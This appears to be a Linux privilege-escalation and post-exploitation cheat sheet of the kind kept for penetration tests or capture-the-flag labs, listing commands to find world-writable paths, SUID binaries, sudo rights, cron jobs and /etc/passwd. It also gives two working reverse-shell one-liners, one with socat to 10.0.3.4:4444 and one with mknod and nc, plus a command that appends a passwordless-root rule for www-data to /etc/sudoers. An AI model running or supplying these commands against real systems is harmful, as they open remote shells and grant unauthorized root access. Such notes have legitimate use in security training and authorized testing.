- Find World Writable Folders
find / -xdev -type d -perm -0002 -ls 2> /dev/null
- Find World Writable Files
```ShellSession
find / -xdev -type f -perm -0002 -ls 2> /dev/null- Find SUIDs
find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null- DIstro Information
cat /etc/*-release- Check open ports
netstat -antup- Check for sudo permissions
sudo -l- Check OS architecture
uname -a- Check cronjobs
cat /etc/cron*- Check network configuration
ip addr- Check contents of /etc/passwd
cat /etc/passwd- Using socat
- Listen
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444- Connect
$ socat file:`tty`,raw,echo=0 tcp-listen:4444- Reverse connection using mknod
mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe- Check version of an installed application
dpkg -l <application name>-
Sometimes checking
/opt/tmp/var/usrmight help. -
Edit sudoers file and grant sudo access to the current user (www-data in this case) with no password
echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers